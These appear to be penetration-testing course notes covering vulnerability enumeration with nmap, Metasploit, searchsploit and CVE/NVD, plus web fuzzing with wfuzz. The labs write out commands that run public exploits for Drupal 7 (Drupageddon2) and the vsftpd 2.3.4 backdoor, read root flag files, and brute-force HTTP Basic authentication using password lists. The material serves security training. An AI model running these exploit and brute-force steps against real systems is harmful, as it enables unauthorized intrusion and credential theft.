# Vulnerability Enumeration 弱點列舉 ## 講解 :::info An examination of the connection between scan results and existing vulnerabilities, highlighting several such datasets along the way. ::: * 服務標的 * Server Message Block (SMB) server running on Windows XP * HTTP Server * FTP Server * 工具 * metasploit  * ms08-067 * exploit DB * drupla 7 * MITRE's CVE and NIST's NVD listings * vsftp 2.3.4 exploit ## The Metasploit Framework Metasploit is perhaps the easiest-to-use and publicly-available exploit framework. A complete module on this framework is beyond the scope of this module, but an introduction is provided here. Metasploit is a framework written in Ruby for managing exploits, payloads, and post-exploitation activities as plug-in modules. The IT security company Rapid7 maintains Metasploit. The 'Community' edition is part of the Kali Linux penetration testing distribution package. The public develops the set of exploit plug-ins in Metasploit's Community Edition. Each entry is of varying quality in terms of efficacy, documentation, and verbosity of errors. Still, when searching for polished and released exploits, this framework provides a good starting point. Launch a console into the installed Metasploit framework from any Linux station using the command msfconsole. From there, use the search command to search for available plug-ins. For instance, to search for plug-ins relating to the mail transfer agent (MTA) Postfix, enter search postfix as shown below:  The following lab, completed using the aggressor VM image located on the right-hand panel, walks you through identifying a vulnerable service and exploiting it using Metasploit. ### LAB: Scan the Service * Run an nmap scan against 192.168.174.121 by entering the following command: ```bash nmap -sC 192.168.174.121 nmap --script smb-vuln-ms10-061.nse -p 445 192.168.174.121 nmap --script smb-vuln-ms08-067.nse –-script-args=unsafe=1 -p 445 192.168.174.121 ```    * The command reveals, among other things, an SMB server listening at that IP address. A list of nmap scripts that you can use to probe for vulnerabilities in this service can be viewed by entering: `ls -alrt /usr/share/nmap/scripts/ | egrep 'smb-vuln'`  The scan results show that the SMB service on 192.168.174.121 is vulnerable to MS08-067. This storied vulnerability came to the world's attention in 2008 when unknown actors used it to proliferate the 'Conficker' worm, which would eventually infect over ten million devices and become the most prolific computer infection in history to that date. Luckily, the worm itself did not do much damage based on its final end-action, which was to install a spambot, scareware, and adware. Notably, the vulnerability was weaponized within just two weeks of Microsoft's notification of the vulnerability. This timeline suggests the attackers operated with a very fast turnaround time. The exploit is publicly referenced as CVE-2008-4250, but Microsoft's index is more commonly known: MS08-067. The following lab walks you through using it in the context of the Metasploit framework. ## LAB: Exploit the Service!       ## The Exploit Database Another publicly available repository of exploits is the Exploit Database (exploit-db) and replicated on all Kali Linux devices. Like Metasploit, content on exploit-db is community-provided and comes with all the same qualifiers regarding efficacy, documentation, and error handling. However, the database curators sometimes test and verify submissions that appear to be more impactful. Access and search the database online at  https://www.exploit-db.com/ . If the Linux device has exploit-db installed, you can also perform a keyword search with the searchsploit command. For instance, as shown in the screenshot below, to search for all of the exploits concerning the file transfer protocol (FTP) server FileZilla, enter: `searchsploit FileZilla`  A unique number is assigned to each entry in the database in the order they are submitted, counting one-up from the previous entry. For example, exploit 44450 might have nothing to do with exploit 44449, so there are large gaps in search results. When used as an argument to the -m command-line option, `searchsploit` copies the exploit into the working directory to be read. For example, to copy the "Filezilla client 2.2.X SEH buffer overflow exploit" into the current workspace, type: `searchsploit -m 37729` Although exploit-db does contain Metasploit modules, it is not bound to a framework. This makes it easier to include more content (especially since it is not limited to exploits written in a single programming language). But it also means that it is up to the user to handle the payload delivered by the exploit and perform any follow-on actions. The following lab walks through the steps of identifying a service running on a target device, locating a functional exploit in the Exploit Database, and using it to run commands on the target. ### LAB: In-depth Reconnaissance ```bash nmap -sC 192.168.174.54 searchsploit "Drupal 7" curl --output CHANGELOG.txt http://192.168.174.54/CHANGELOG.txt ```    Drupal releases, like many applications, use both major and minor version numbers. For example, Drupal 8.32 has a "major version number 8" and "minor version number 32". Many of the exploits in the list returned from `searchsploit` mention both major and minor version numbers when browsing for vulnerabilities. In a professional engagement, a penetration tester might carefully examine every single one of these results to determine which (if any) have a likelihood of success. In the case here, a careless server configuration leaks the minor version number. Examine the `CHANGELOG.txt` file saved in step 3 above using your favorite Linux editor. Server logic should protect this document, but a default application install does not do this. Annotating the list of changes between revisions (oldest changes at the bottom), it becomes clear from the top of the document that this is Drupal 7.57. The exploit at entry 44449, which exploits CVE-2018-7600 and is commonly known as "Drupageddon2", claims to be effective against Drupal < 7.58, which applies here. ### LAB: Do it Live! ```bash searchsploit -m 44449 ruby 44449.rb ruby 44449.rb http://192.168.174.54/ uname -a cat /var/www/flag.txt ```    ## CVE and NVD Listings While `exploit-db` and the Metasploit framework maintain pre-existing exploits, they hardly account for the total sum of information system vulnerabilities discovered in software over the years. There may be many reasons for this, including that the vulnerability is too difficult to exploit or the application is too difficult to reverse engineer. An example of this might occur on Linux systems, where an exploit mitigation technology called Address Space Layout Randomization (ALSR) reduces the likelihood of a common memory corruption technique being successful by a factor of 524,288. Generally, the most common reason is that security researchers may not publish proofs-of-concept of the vulnerability and instead share the information discreetly with a product developer, only describing the vulnerability to the public in general terms. This scenario leaves exploit developers with the often-cumbersome task of reverse-engineering the patch. The MITRE Corporation maintains a catalog of software vulnerabilities called the Common Vulnerability and Exposures (CVE) list, containing software vulnerabilities descriptions reported to them with varying specificity. Access this list outside of the lab environment at https://cve.mitre.org/, and download in bulk or search for specific terms. The National Institute of Standards and Technology's (NIST) National Vulnerability Database (NVD) also contains this list at: https://nvd.nist.gov/   Vulnerabilities are also cataloged by various elements such as severity and ease-of-exploitation, as well as the applicability of three categories:  ## Using the Listings Yourself Some of the vulnerabilities may not have a publicly accessible proof-of-concept exploit associated with them, and some may not need that since it is so simple to exploit. For an example of the simple exploit, do a "Keyword Search" at https://nvd.nist.gov/vuln/search   for "vsFTPd", a popular file transfer protocol (FTP) server. One of the results is a 2011 vulnerability, identified at https://nvd.nist.gov/vuln/detail/CVE-2011-2523, which is considered 'Critical' and is simple enough to exploit manually. This vulnerability has an interesting story behind it. Before package managers, the source code for vsFTPd was hosted on the website vsftpd.beasts.org. On 30 June 2011, the source code for vsFTPd version 2.3.4 (the latest version at the time) was replaced with source code containing a backdoor which makes a root shell accessible when an attacker attempted to log in with a username that ended in a smiley-face :) and any password. The backdoor was discovered (the perpetrator, incidentally, wasn't), and the source code was replaced on 3 July 2011. Anybody who installed the software between those dates would have installed the backdoor. If during a penetration test the tester encounters vsFTPd 2.3.4, it may contain this exploitable backdoor. The following labs demonstrate how this works. ### LAB ```bash nc -nv 192.168.174.54 21 USER anonymous PASS ```   ```bash nc -nv 192.168.174.202 21 USER anonymous PASS searchsploit "vsftpd 2.3.4" searchsploit -m 49757 python 49757.py python 49757.py 192.168.174.202 uname -a && id cat /root/flag.txt ```    ## Summary While there is no shortage of vulnerabilities cataloged in these archives, it is important to point out that even these are by no means actually 'complete' in any sense. The MITRE CVE List and NIST's National Vulnerability Database focus on software and technology mainly used in Western markets and are available to security researchers. These databases may not contain custom or proprietary technology unavailable to researchers. This is especially true for technology sourced to countries that actively work to prevent vulnerabilities from appearing in these databases or where the information flow is restricted. For instance, searching the CVE list at Mitre for the keyword "Cisco" (the American telecommunications company Cisco Systems, currently valued near $49 billion) turns up 5642 entries. Meanwhile, searching the CVE list at Mitre for the keyword "Xiaomi", a Chinese telecommunications conglomerate currently valued somewhat equivalently (near $43 billion), brings up only 69 entries. (Figures accurate at the development time of this module.) Still, using these databases to link available exploits to observed services is a powerful and effective first step in any penetration test, whether as an aggressor or defender. # Web Application Fuzzing 模糊測試 :::info Introduces the idea of unstructured client requests to web applications, and some of the vulnerabilities that can ensue when these are not properly handled. Prominently featured is wfuzz, the Python fuzzing framework, but the lessons reach beyond the simple use of the tool. ::: * 學習目標 * Enumerate hidden virtual hosts. * Use a brute-force attack to obtain authentication information to access a web page. * Identify a vulnerable header parameter in an insecure Internet of Things (IoT) device. * 工具 * wfuzz * seclists ## Fuzzing One concept used in software testing and maintenance is to subject a program to unanticipated requests in anticipation of unintended behavior. The automated selection of these client requests generated from unstructured input is called "fuzzing". The idea behind this technique is to identify and explore unintentional attack surfaces on a server that subsequently may not be well-handled. When testing against web servers, responses that include uncommon status codes, empty responses, or server crashes could indicate the presence of a misconfiguration or vulnerability when subjected to a given input. ## seclists It is an archive of wordlists that includes common directory names and hostnames, strange entries seen in system logs, and (allegedly) leaked username and password data, as well as many other payloads a penetration tester might want by their side. The focus of the 'Discovery' subset of these lists is to find data, which includes common hostnames, exposed file names, and of course, dictionary lists for web attacks. It also includes the 'Usernames' and 'Passwords' directories which contain various lists that are most likely what they claim to be. In this module, each of the suggested wordlists chosen was because it was known in advance to have an entry that succeeds for the given lab or challenge. For any real-life penetration tester, it is a good idea to get acquainted with the entirety of these lists due to the wide variety of payloads the wordlists can provide at a moment's notice. When installed on Kali through the command apt install seclists, the installation stores the archive in the directory /usr/share/seclists/. A replication of this archive is on your aggressor VM workstation for the labs. In this module's labs, to reduce the command's directory locations length, the command's environment variables are defined to point to each subdirectory, for example: * $DISC = /usr/share/seclists/Discovery/ * $USER = /usr/share/seclists/Usernames/ * $MISC = /usr/share/seclists/Miscellaneous/ To read the complete list used, enter the following command into any terminal on your aggressor VM workstation: tail ~/.bashrc ## wfuzz The primary tool for this module is Wfuzz, documented here:  https://wfuzz.readthedocs.io/en/latest/  and available through the Python Package Index via the command pip install wfuzz. An installed version of Wfuzz is on the aggressor VM used later in this module. The takeaways from this module, however, extend beyond the fact that this is a nifty tool. The fuzzing strategies developed can explore the unanticipated behavior of web servers, regardless of the tool in use, and often generalized to other protocols such as Simple Object Access Protocol (SOAP) or eXtensible Message Parsing Protocol (XMPP). ### Finding Subdirectories Wfuzz's primary arguments are a web resource to examine, a wordlist to use, and an element of the request to replace with items from the wordlist. The web resource is positional, occurring as the last argument. The FUZZ keyword specifies the request portion that gets wordlist content injected. Use additional arguments to further specify request parameters or output criteria that warrant further examination. For instance, the following command searches for potential subdirectories in the web server at www.target.local from a very long list to see if any are discovered: ```bash wfuzz --hc 404 -c -z file,$DISC/Web-Content/common.txt http://www.target.local/FUZZ/ ```  The above request uses the following options: * The --hc option specifies HTTP response codes that it will redact from the output of the request.The 404 argument specifies HTTP Status Code 404: "Not Found". * The -c option specifies to display output in color. * The -z option specifies a wordlist; its argument has two parts:file specifies that the file system reads the wordlist from the file system.$DISC/Web-Content/common.txt is the file location to read the wordlist from. * The final argument, http://www.target.local/FUZZ, is the web resource to target, and the position of the FUZZ keyword indicates that Wfuzz looks for first-layer subdirectories to the root of the web server.  ### Fuzzing Authentication In the previous lab, one of the payloads generated a response from the web server with HTTP Status Code 401 Unauthorized. This response indicates that the web server wanted the client to authenticate through the HTTP request before responding with the requested resource. Were you to open a browser and navigate to http://www.target.local/info_spaces/, a pop-up displays that requests authentication that looks much like the one below:  Wfuzz does not attempt to follow through on authentication requests unless specifically told to do so. The lab at the end of this module does this. But since neither a username nor password is known, an additional technique must be introduced first. #### Fuzzing Two Request Parameters To specify additional keywords to be fuzzed, use FUZZ in the command to specify the first one, then FUZ2Z, FUZ3Z and so on, to specify additional portions of the request to be fuzzed. The payload sources used for each keyword are specified with the -z option and associated with the FUZZ keywords in left-to-right order. Consider the following command: ```bash wfuzz -z file,/path/to/wordlistA.txt -z file,/path/to/wordlistB.txt \ http://www.target.local/FUZZ/FUZ2Z ``` This command uses Wfuzz to interrogate the web request for two layers of subdirectories. Payloads in the first layer are drawn from wordlistA.txt and payloads in the second from wordlistB.txt. Be strategic when deciding to fuzz multiple keywords from multiple wordlists; the number of requests made will be the product of the length of each list! #### HTTP Authentication Types HTTP supports several header-based authentication methods, including: * "Basic", where authentication information is sent plain and altered. * "Digest", where authentication information is sent as a salted hash. * "NTLM", which is proprietarily defined by Microsoft. In addition to these, web servers can also define custom application methods built through a dynamic preprocessor such as PHP, which often sends authentication information in POST data (such as when submitting a form). #### LAB: Determine the Authentication Type ```bash curl --head --verbose http://www.target.local/info_spaces/ wfuzz --hc 401 -c -z file,$USER/cirt-default-usernames.txt \ -z file,$PASS/2020-200_most_used_passwords.txt \ --basic FUZZ:FUZ2Z http://www.target.local/info_spaces/ ```   ### Discovering Virtual Hosts In the lab environment associated with this module, the location of the domain 'target.local' is 192.168.174.202 and browsing to  http://www.target.local/  and  http://192.168.174.202/  returns the same webpage. Browsing to  http://blah.target.local/  also redirects to this page, indicating that the web server actually interpreted  http://blah.target.local/  as a web resource and searched for it internally, then returned the same page. This result could indicate that this is just the default resource for this web server. If that is the case, then are there more resources, and how do we find them? #### Virtual Hosting The most popular web servers on the Internet, apache2, Nginx, and Microsoft's IIS, all support the concept of virtual hosting. Virtual hosting uses the idea that the same web server can host multiple websites, each identified by its hostname. The web server decides which resource to return to the client by using the name that the client identifies as the resource it is looking for. The following shows the contents of a request to  http://www.target.local/: ```bash GET / HTTP/1.1 Host: www.target.local Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 ``` If this request is captured as a packet, an IP address identifies the destination in the packet headers: 192.168.174.202. In the HTTP headers above, the header identifies the requested resource in the "Host" parameter. This lends itself as a way to search for more resources at 192.168.174.202 by customizing the request headers and inserting the fuzzing payloads there. Wfuzz supports adding arbitrary headers using the -H option, with the header as its argument. To find more virtual hosts at target.local, Wfuzz would only need the following added to the command line: -H "FUZZ.target.local". #### LAB ```bash wfuzz --hh 11320 -c -z file,$DISC/DNS/subdomains-top1million-5000.txt \ -H "Host: FUZZ.target.local" http://192.168.174.202/ ```   ## Summary This module examined several use cases and strategies for fuzzing web parameters, but it hardly ends there. The fuzzing of form data, XML parameters, and JSON Web Tokens (JWT) continue to uncover vulnerabilities. Using only a small portion of the SecLists database, these attacks could still discover hidden web pages, credentials, and a memory corruption vulnerability, a demonstrable amount of impact for a single technique.